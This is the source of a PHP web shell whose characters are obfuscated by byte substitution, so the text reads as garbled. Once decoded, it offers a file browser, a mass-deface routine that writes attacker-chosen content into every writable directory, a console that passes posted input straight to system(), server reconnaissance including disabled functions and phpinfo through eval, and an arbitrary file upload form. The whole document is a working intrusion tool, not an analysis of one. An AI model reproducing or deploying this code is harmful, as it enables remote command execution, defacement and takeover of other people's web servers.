\xed\xb5=\xb5g\xfb\xeacw\xf1();\r\n\t\t\t\t}\r\n\t\t\t\t\t\$p\xf5\xea\xed\xb5=\xb5\xe6\xear_r\xfbpl\xf5c\xfb('\\\\','/',\$p\xf5\xea\xed);\r\n\t\t\t\t\t\$p\xf5\xea\xed\xe6\xb5=\xb5\xfbxpl\xe1\xf1\xfb('/',\$p\xf5\xea\xed);\r\n\t\t\t\tf\xe1r\xfb\xf5c\xed(\$p\xf5\xea\xed\xe6\xb5\xf5\xe6\xb5\$\xeb\xf1=>\$p\xf5\xea){\r\n\t\t\t\t\xebf(\$p\xf5\xea\xb5==\xb5''\xb5&&\xb5\$\xeb\xf1\xb5==\xb50){\r\n\t\t\t\t\t\$\xf5\xb5=\xb5\xear\xe3\xfb;\r\n\t\t\t\t\t\xfbc\xed\xe1\xb5'<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6=\"\xea\xf5bl\xfb-r\xfb\xe6p\xe1n\xe6\xeb\xfd\xfb\"><\xeb\xb5cl\xf5\xe6\xe6=\"b\xeb\xb5b\xeb-\xed\xf1\xf1-r\xf5ck\"></\xeb>\xb5:\xb5<\xf5\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\xb5\xea\xfbx\xea-l\xebg\xed\xea\"\xb5\xedr\xfbf=\"?p\xf5\xea\xed=/\">/</\xf5>';\r\n\t\t\t\tc\xe1n\xea\xebn\xe3\xfb;\r\n\t\t\t\t}\r\n\t\t\t\t\xebf(\$p\xf5\xea\xb5==\xb5'')\xb5c\xe1n\xea\xebn\xe3\xfb;\r\n\t\t\t\t\t\xfbc\xed\xe1\xb5'<\xf5\xb5cl\xf5\xe6\xe6=\"\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb\"\xb5\xedr\xfbf=\"?p\xf5\xea\xed=';\r\n\t\t\t\tf\xe1r(\$\xeb=0;\$\xeb<=\$\xeb\xf1;\$\xeb++){\r\n\t\t\t\t\t\xfbc\xed\xe1\xb5\"\$p\xf5\xea\xed\xe6[\$\xeb]\";\r\n\t\t\t\t\xebf(\$\xeb\xb5!=\xb5\$\xeb\xf1)\xb5\xfbc\xed\xe1\xb5\"/\";\r\n\t\t\t\t}\r\n\t\t\t\t\xfbc\xed\xe1\xb5'\">'.\$p\xf5\xea.'</\xf5>/';\r\n\t\t\t\t}\r\n\t\t\t\t\xfbc\xed\xe1\xb5\"\xb5[\xb5\".\xe2\x96\x9f(\$p\xf5\xea\xed,\xb5p(\$p\xf5\xea\xed)).\"\xb5]</\xf1\xeb\xfd>\";\r\n\t\t\t\xfbc\xed\xe1\xb5\"\r\n\t\t</\xf1\xeb\xfd>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe1n\xea\xf5\xebn\xfbr-fl\xe3\xeb\xf1'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='b\xe1x\xb5\xe6\xed\xf5\xf1\xe1w\xb5bg-\xf1\xf5rk\xb5p-4\xb5r\xe1\xe3n\xf1\xfb\xf1-3'>\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-c\xfbn\xea\xfbr'>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m'\xb5\xedr\xfbf='?\xeb\xf1=\xe3pl\xe1\xf5\xf1&p\xf5\xea\xed=\$p\xf5\xea\xed'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xe3pl\xe1\xf5\xf1'></\xeb>\xb5\xe3pl\xe1\xf5\xf1</\xf5>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m'\xb5\xedr\xfbf='?\xeb\xf1=\xf1\xfbf\xf5c\xfb&p\xf5\xea\xed=\$p\xf5\xea\xed'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xfbxcl\xf5m\xf5\xea\xeb\xe1n-\xf1\xeb\xf5m\xe1n\xf1'></\xeb>\xb5m\xf5\xe6\xe6\xb5\xf1\xfbf\xf5c\xfb</\xf5>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m'\xb5\xedr\xfbf='?\xeb\xf1=\xf1\xfbl\xfb\xea\xfb&p\xf5\xea\xed=\$p\xf5\xea\xed'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xear\xf5\xe6\xed'></\xeb>\xb5m\xf5\xe6\xe6\xb5\xf1\xfbl\xfb\xea\xfb</\xf5>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m'\xb5\xedr\xfbf='?\xeb\xf1=cm\xf1&p\xf5\xea\xed=\$p\xf5\xea\xed'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xea\xfbrm\xebn\xf5l'></\xeb>\xb5c\xe1n\xe6\xe1l\xfb</\xf5>\r\n\t\t\t<\xf5\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xe1\xe3\xeal\xebn\xfb-l\xebg\xed\xea\xb5b\xean-\xe6m'\xb5\xedr\xfbf='?\xeb\xf1=\xebnf\xe1&p\xf5\xea\xed=\$p\xf5\xea\xed'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xebnf\xe1-c\xebrcl\xfb'></\xeb>\xb5\xebnf\xe1\xb5\xe6\xfbr\xfd\xfbr</\xf5>\r\n\t\t</\xf1\xeb\xfd>\";\r\n//\xb5\xea\xe1\xe1l\xe6\xb5ny\xf5\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_GET['p\xf5\xea\xed']))\xb5{\r\n\t\$\xf1\xebr\xb5=\xb5\$_GET['p\xf5\xea\xed'];\r\n\tc\xed\xf1\xebr(\$\xf1\xebr);\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\$\xf1\xebr\xb5=\xb5g\xfb\xeacw\xf1();\r\n}\r\n\$\xf1\xebr\xb5=\xb5\xe6\xear_r\xfbpl\xf5c\xfb(\"\\\\\",\"/\",\$\xf1\xebr);\r\n\$\xe6c\xf1\xebr\xb5=\xb5\xfbxpl\xe1\xf1\xfb(\"/\",\xb5\$\xf1\xebr);\t\r\nf\xe1r(\$\xeb\xb5=\xb50;\xb5\$\xeb\xb5<=\xb5\$c_\xf1\xebr;\xb5\$\xeb++)\xb5{\r\n\t\$\xe6c\xf1\xebr[\$\xeb];\r\n\t\xebf(\$\xeb\xb5!=\xb5\$c_\xf1\xebr)\xb5{\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'\xf1\xfbf\xf5c\xfb'){\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\";\r\nf\xe3nc\xea\xeb\xe1n\xb5m\xf5\xe6\xe6_k\xf5b\xfb\xed(\$\xf1\xebr,\$n\xf5m\xf5f\xebl\xfb,\$\xeb\xe6\xeb_\xe6cr\xebp\xea)\xb5{\r\n\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebr))\xb5{\r\n\t\$\xf1\xebr\xf5\xb5=\xb5\xe6c\xf5n\xf1\xebr(\$\xf1\xebr);\r\n\tf\xe1r\xfb\xf5c\xed(\$\xf1\xebr\xf5\xb5\xf5\xe6\xb5\$\xf1\xebrb)\xb5{\r\n\t\t\$\xf1\xebrc\xb5=\xb5\"\$\xf1\xebr/\$\xf1\xebrb\";\r\n\t\t\$\xe2\x96\x9a\xb5=\xb5\$\xf1\xebrc.'/'.\$n\xf5m\xf5f\xebl\xfb;\r\n\t\t\xebf(\$\xf1\xebrb\xb5===\xb5'.')\xb5{\r\n\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t}\xb5\xfbl\xe6\xfb\xebf(\$\xf1\xebrb\xb5===\xb5'..')\xb5{\r\n\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\t\xebf(\xeb\xe6_\xf1\xebr(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\t\xfbc\xed\xe1\xb5\"[<gr><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-c\xed\xfbck-\xf5ll'></\xeb></gr>]&nb\xe6p;\$\xe2\x96\x9a<br>\";\r\n\t\t\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t\t\t\t\$\xe2\x96\x9f\xb5=\xb5m\xf5\xe6\xe6_k\xf5b\xfb\xed(\$\xf1\xebrc,\$n\xf5m\xf5f\xebl\xfb,\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nf\xe3nc\xea\xeb\xe1n\xb5m\xf5\xe6\xe6_b\xeb\xf5\xe6\xf5(\$\xf1\xebr,\$n\xf5m\xf5f\xebl\xfb,\$\xeb\xe6\xeb_\xe6cr\xebp\xea)\xb5{\r\n\t\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebr))\xb5{\r\n\t\t\$\xf1\xebr\xf5\xb5=\xb5\xe6c\xf5n\xf1\xebr(\$\xf1\xebr);\r\n\t\tf\xe1r\xfb\xf5c\xed(\$\xf1\xebr\xf5\xb5\xf5\xe6\xb5\$\xf1\xebrb)\xb5{\r\n\t\t\t\$\xf1\xebrc\xb5=\xb5\"\$\xf1\xebr/\$\xf1\xebrb\";\r\n\t\t\t\$\xe2\x96\x9a\xb5=\xb5\$\xf1\xebrc.'/'.\$n\xf5m\xf5f\xebl\xfb;\r\n\t\t\t\xebf(\$\xf1\xebrb\xb5===\xb5'.')\xb5{\r\n\t\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t\t}\xb5\xfbl\xe6\xfb\xebf(\$\xf1\xebrb\xb5===\xb5'..')\xb5{\r\n\t\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\t\t\xebf(\xeb\xe6_\xf1\xebr(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\t\xebf(\xeb\xe6_wr\xeb\xea\xf5bl\xfb(\$\xf1\xebrc))\xb5{\r\n\t\t\t\t\t\t\xfbc\xed\xe1\xb5\"[<gr><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-c\xed\xfbck-\xf5ll'></\xeb></gr>]&nb\xe6p;\$\xf1\xebrb/\$n\xf5m\xf5f\xebl\xfb<br>\";\r\n\t\t\t\t\t\tf\xebl\xfb_p\xe3\xea_c\xe1n\xea\xfbn\xea\xe6(\$\xe2\x96\x9a,\xb5\$\xeb\xe6\xeb_\xe6cr\xebp\xea);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n\xebf(\$_POST['\xe6\xea\xf5r\xea'])\xb5{\r\n\t\xebf(\$_POST['\xea\xebp\xfb']\xb5==\xb5'm\xf5\xe6\xe6\xf5l')\xb5{\r\n\tm\xf5\xe6\xe6_k\xf5b\xfb\xed(\$_POST['\xf1_\xf1\xebr'],\xb5\$_POST['\xf1_f\xebl\xfb'],\xb5\$_POST['\xe6cr\xebp\xea']);\r\n\t}\xb5\xfbl\xe6\xfb\xebf(\$_POST['\xea\xebp\xfb']\xb5==\xb5'b\xeb\xf5\xe6\xf5')\xb5{\r\n\tm\xf5\xe6\xe6_b\xeb\xf5\xe6\xf5(\$_POST['\xf1_\xf1\xebr'],\xb5\$_POST['\xf1_f\xebl\xfb'],\xb5\$_POST['\xe6cr\xebp\xea']);\r\n\t}\r\n\t\xfbc\xed\xe1\xb5\"<br>\";\r\n}\r\n\xfbc\xed\xe1\xb5\"\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'>\r\n\t\t<kb\xf1>\$_x&nb\xe6p;M\xf5\xe6\xe6\xb5\xf1\xfbf\xf5c\xfb</kb\xf1>\r\n\t\t<br>T\xebp\xfb:<br>\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l\xb5c\xe3\xe6\xea\xe1m-\xe6w\xeb\xeac\xed'>\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l-\xebnp\xe3\xea'\xb5\xeayp\xfb='c\xed\xfbckb\xe1x'\xb5\xeb\xf1='c\xe3\xe6\xea\xe1mSw\xeb\xeac\xed'\xb5n\xf5m\xfb='\xea\xebp\xfb'\xb5\xfd\xf5l\xe3\xfb='b\xeb\xf5\xe6\xf5'>\r\n\t\t\t<l\xf5b\xfbl\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l-l\xf5b\xfbl'\xb5f\xe1r='c\xe3\xe6\xea\xe1mSw\xeb\xeac\xed'>B\xeb\xf5\xe6\xf5</l\xf5b\xfbl>\r\n\t\t</\xf1\xeb\xfd>\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l\xb5c\xe3\xe6\xea\xe1m-\xe6w\xeb\xeac\xed'>\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l-\xebnp\xe3\xea'\xb5\xeayp\xfb='c\xed\xfbckb\xe1x'\xb5\xeb\xf1='c\xe3\xe6\xea\xe1mSw\xeb\xeac\xed1'\xb5n\xf5m\xfb='\xea\xebp\xfb'\xb5\xfd\xf5l\xe3\xfb='m\xf5\xe6\xe6\xf5l'>\r\n\t\t\t<l\xf5b\xfbl\xb5cl\xf5\xe6\xe6='c\xe3\xe6\xea\xe1m-c\xe1n\xear\xe1l-l\xf5b\xfbl'\xb5f\xe1r='c\xe3\xe6\xea\xe1mSw\xeb\xeac\xed1'>M\xf5\xe6\xe6\xf5l</l\xf5b\xfbl>\r\n\t\t</\xf1\xeb\xfd>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xe1l\xf1\xfbr'></\xeb>\xb5L\xe1k\xf5\xe6\xeb:\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='\xf1_\xf1\xebr'\xb5\xfd\xf5l\xe3\xfb='\$\xf1\xebr'>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk'></\xeb>\xb5N\xf5m\xf5\xb5f\xebl\xfb:\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='\xf1_f\xebl\xfb'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='n\xf5m\xf5\xb5f\xebl\xfb'\xb5\$_r>\r\n\t\t\t<\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-f\xebl\xfb-\xfb\xf5rm\xf5rk'></\xeb>\xb5I\xe6\xeb\xb5f\xebl\xfb:\r\n\t\t\t<\xea\xfbx\xea\xf5r\xfb\xf5\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5r\xe1w\xe6='7'\xb5n\xf5m\xfb='\xe6cr\xebp\xea'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='\xeb\xe6\xeb\xb5f\xebl\xfb'\xb5\$_r></\xea\xfbx\xea\xf5r\xfb\xf5>\r\n\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m\xb5b\xean-bl\xe1ck'\xb5\xeayp\xfb='\xe6\xe3bm\xeb\xea'\xb5n\xf5m\xfb='\xe6\xea\xf5r\xea'\xb5\xfd\xf5l\xe3\xfb='m\xf5\xe6\xe6\xb5\xf1\xfbf\xf5c\xfb'>\r\n\t\t</f\xe1rm>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'cm\xf1'){\r\n\xebf(\$_POST['\xfbk\xe6\xfbCMD'])\xb5{\r\n\$cm\xf1\xb5=\xb5\$_POST['\xfbk\xe6\xfbCMD'];\r\n}\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t<kb\xf1>\$_x&nb\xe6p;C\xe1n\xe6\xe1l\xfb</kb\xf1>\r\n\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xe1n\xea\xf5\xebn\xfbr-fl\xe3\xeb\xf1\xb5l\xf5ng\xe3\xf5g\xfb-j\xf5\xfd\xf5\xe6cr\xebp\xea'>\r\n\t\t\t<pr\xfb\xb5\xe6\xeayl\xfb='f\xe1n\xea-\xe6\xebz\xfb:10px;'><gr>~</gr>\$&nb\xe6p;<r\xf1>\$cm\xf1</r\xf1><br><c\xe1\xf1\xfb>\";\xb5\xe6y\xe6\xea\xfbm(\$_POST['\xfbk\xe6\xfbCMD'].'\xb52>&1');\xb5\xfbc\xed\xe1\xb5\"</c\xe1\xf1\xfb></pr\xfb>\r\n\t\t</\xf1\xeb\xfd>\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'>\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xebnp\xe3\xea-gr\xe1\xe3p\xb5mb-3'>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xea\xfbx\xea'\xb5n\xf5m\xfb='\xfbk\xe6\xfbCMD'\xb5\xfd\xf5l\xe3\xfb='\$cm\xf1'\xb5pl\xf5c\xfb\xed\xe1l\xf1\xfbr='w\xed\xe1\xf5m\xeb'\xb5\$_r>\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xe6\xe3mb\xeb\xea'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xf5rr\xe1w-r\xfb\xea\xe3rn-r\xebg\xed\xea'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t</\xf1\xeb\xfd>\r\n\t\t</f\xe1rm>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'\xebnf\xe1'){\r\n\$\xf1\xeb\xe6f\xe3nc\xb5=\xb5@\xebn\xeb_g\xfb\xea(\"\xf1\xeb\xe6\xf5bl\xfb_f\xe3nc\xea\xeb\xe1n\xe6\");\r\n\xebf(\xfbmp\xeay(\$\xf1\xeb\xe6f\xe3nc))\xb5{\r\n\t\$\xf1\xeb\xe6fc\xb5=\xb5\"<gr>NONE</gr>\";\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\$\xf1\xeb\xe6fc\xb5=\xb5\"<r\xf1>\$\xf1\xeb\xe6f\xe3nc</r\xf1>\";\r\n}\r\n\xebf(!f\xe3nc\xea\xeb\xe1n_\xfbx\xeb\xe6\xea\xe6('p\xe1\xe6\xebx_g\xfb\xea\xfbg\xeb\xf1'))\xb5{\r\n\t\$\xe3\xe6\xfbr\xb5=\xb5@g\xfb\xea_c\xe3rr\xfbn\xea_\xe3\xe6\xfbr();\r\n\t\$\xe3\xeb\xf1\xb5=\xb5@g\xfb\xeamy\xe3\xeb\xf1();\r\n\t\$g\xeb\xf1\xb5=\xb5@g\xfb\xeamyg\xeb\xf1();\r\n\t\$gr\xe1\xe3p\xb5=\xb5\"?\";\r\n}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\$\xe3\xeb\xf1\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeapw\xe3\xeb\xf1(p\xe1\xe6\xebx_g\xfb\xea\xfb\xe3\xeb\xf1());\r\n\t\$g\xeb\xf1\xb5=\xb5@p\xe1\xe6\xebx_g\xfb\xeagrg\xeb\xf1(p\xe1\xe6\xebx_g\xfb\xea\xfbg\xeb\xf1());\r\n\t\$\xe3\xe6\xfbr\xb5=\xb5\$\xe3\xeb\xf1['n\xf5m\xfb'];\r\n\t\$\xe3\xeb\xf1\xb5=\xb5\$\xe3\xeb\xf1['\xe3\xeb\xf1'];\r\n\t\$gr\xe1\xe3p\xb5=\xb5\$g\xeb\xf1['n\xf5m\xfb'];\r\n\t\$g\xeb\xf1\xb5=\xb5\$g\xeb\xf1['g\xeb\xf1'];\r\n}\r\n\$\xe6m\xb5=\xb5(@\xebn\xeb_g\xfb\xea(\xe6\xear\xea\xe1l\xe1w\xfbr(\"\xe6\xf5f\xfb_m\xe1\xf1\xfb\"))\xb5==\xb5'\xe1n')\xb5?\xb5\"<r\xf1>ON</r\xf1>\"\xb5:\xb5\"<gr>OFF</gr>\";\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\r\n\t<kb\xf1>\$_x&nb\xe6p;Inf\xe1\xb5\xe6\xfbr\xfd\xfbr</kb\xf1>\r\n\t\t<br>\r\n\t\tUn\xf5m\xfb:\xb5<gr>\".p\xedp_\xe3n\xf5m\xfb().\"</gr><br\xb5/>\r\n\t\tS\xe1f\xeaw\xf5r\xfb:\xb5<gr>\".\$_SERVER['SERVER_SOFTWARE'].\"</gr><br\xb5/>\r\n\t\tPHP\xb5\xfd\xfbr\xe6\xeb\xe1n:\xb5<gr>\".PHP_VERSION.\"</gr>\xb5<\xf5\xb5cl\xf5\xe6\xe6='\xea\xfbx\xea-\xf1\xfbc\xe1r\xf5\xea\xeb\xe1n-n\xe1n\xfb'\xb5\xedr\xfbf='?\xeb\xf1=p\xedp\xebnf\xe1&p\xf5\xea\xed=\$p\xf5\xea\xed'>[\xb5PHP\xb5INFO\xb5]</\xf5>\xb5PHP\xb5\xe1\xe6:\xb5<gr>\".PHP_OS.\"</gr><br\xb5/>\r\n\t\tS\xfbr\xfd\xfbr\xb5Ip:\xb5<gr>\".g\xfb\xea\xed\xe1\xe6\xeabyn\xf5m\xfb(\$_SERVER['HTTP_HOST']).\"</gr><br\xb5/>\r\n\t\tY\xe1\xe3r\xb5Ip:\xb5<gr>\".\xebp().\"</gr><br\xb5/>\r\n\t\tU\xe6\xfbr:\xb5<gr>\$\xe3\xe6\xfbr</gr>\xb5(\$\xe3\xeb\xf1)\xb5|\xb5Gr\xe1\xe3p:\xb5<gr>\$gr\xe1\xe3p</gr>\xb5(\$g\xeb\xf1)<br\xb5/>\r\n\t\tS\xf5f\xfb\xb5M\xe1\xf1\xfb:\xb5\$\xe6m<br\xb5/>\r\n\t\t<kb\xf1>D\xeb\xe6\xf5bl\xfb\xb5F\xe3nc\xea\xeb\xe1n:</kb\xf1><pr\xfb>\$\xf1\xeb\xe6fc</pr\xfb>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'p\xedp\xebnf\xe1'){\r\n\t@\xe1b_\xe6\xea\xf5r\xea();\r\n\t@\xfb\xfd\xf5l(\"p\xedp\xebnf\xe1();\");\r\n\t\$b\xe3ff\xb5=\xb5@\xe1b_g\xfb\xea_c\xe1n\xea\xfbn\xea\xe6();\r\n\t@\xe1b_\xfbn\xf1_cl\xfb\xf5n();\t\r\n\t\$\xf5w\xf5l\xb5=\xb5\xe6\xearp\xe1\xe6(\$b\xe3ff,\"<b\xe1\xf1y>\")+6;\r\n\t\$\xf5k\xed\xebr\xb5=\xb5\xe6\xearp\xe1\xe6(\$b\xe3ff,\"</b\xe1\xf1y>\");\r\n\t\xfbc\xed\xe1\xb5\"<pr\xfb\xb5cl\xf5\xe6\xe6='p\xedp_\xebnf\xe1'>\".\xe6\xe3b\xe6\xear(\$b\xe3ff,\$\xf5w\xf5l,\$\xf5k\xed\xebr-\$\xf5w\xf5l).\"</pr\xfb>\";\r\n\t\xfbx\xeb\xea;\r\n}\xb5\xfbl\xe6\xfb\xebf(\$_GET['\xeb\xf1']\xb5==\xb5'\xe3pl\xe1\xf5\xf1'){\r\n\xfbc\xed\xe1\xb5\"\$_\xe6\r\n<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1\xb5\xea\xfbx\xea-\xf1\xf5rk'>\r\n\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='c\xf5r\xf1-\xed\xfb\xf5\xf1\xfbr'>\";\r\n\xebf(\xeb\xe6\xe6\xfb\xea(\$_FILES['f\xebl\xfb'])){\r\n\t\xebf(c\xe1py(\$_FILES['f\xebl\xfb']['\xeamp_n\xf5m\xfb'],\$p\xf5\xea\xed.'/'.\$_FILES['f\xebl\xfb']['n\xf5m\xfb'])){\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>Upl\xe1\xf5\xf1</\xe6\xear\xe1ng>\xb5\xe1k!\xb5'.\xe1k().'</\xf1\xeb\xfd>';\r\n\t\t}\xb5\xfbl\xe6\xfb\xb5{\r\n\t\t\xfbc\xed\xe1\xb5'<\xe6\xear\xe1ng>Upl\xe1\xf5\xf1</\xe6\xear\xe1ng>\xb5g\xf5g\xf5l!\xb5'.\xfbr().'</\xf1\xeb\xfd>';\r\n\t\t}\r\n\t}\r\n\xfbc\xed\xe1\xb5\"\r\n\t\t<f\xe1rm\xb5m\xfb\xea\xed\xe1\xf1='POST'\xb5\xfbnc\xeayp\xfb='m\xe3l\xea\xebp\xf5r\xea/f\xe1rm-\xf1\xf5\xea\xf5'>\r\n\t\t\t<kb\xf1>\$_x&nb\xe6p;Upl\xe1\xf5\xf1\xb5F\xebl\xfb</kb\xf1>\r\n\t\t\t<\xf1\xeb\xfd\xb5cl\xf5\xe6\xe6='\xebnp\xe3\xea-gr\xe1\xe3p\xb5mb-3'>\r\n\t\t\t\t<\xebnp\xe3\xea\xb5cl\xf5\xe6\xe6='f\xe1rm-c\xe1n\xear\xe1l\xb5f\xe1rm-c\xe1n\xear\xe1l-\xe6m'\xb5\xeayp\xfb='f\xebl\xfb'\xb5n\xf5m\xfb='f\xebl\xfb'\xb5\$_r>\r\n\t\t\t\t<b\xe3\xea\xea\xe1n\xb5cl\xf5\xe6\xe6='b\xean\xb5b\xean-\xf1\xf5rk\xb5b\xean-\xe6m'\xb5\xeayp\xfb='\xe6\xe3bm\xeb\xea'><\xeb\xb5cl\xf5\xe6\xe6='b\xeb\xb5b\xeb-\xf5rr\xe1w-r\xfb\xea\xe3rn-r\xebg\xed\xea'></\xeb></b\xe3\xea\xea\xe1n>\r\n\t\t\t</\xf1\xeb\xfd>\r\n\t\t</f\xe1rm>\r\n\t</\xf1\xeb\xfd>\r\n</\xf1\xeb\xfd>\r\n<br>\";\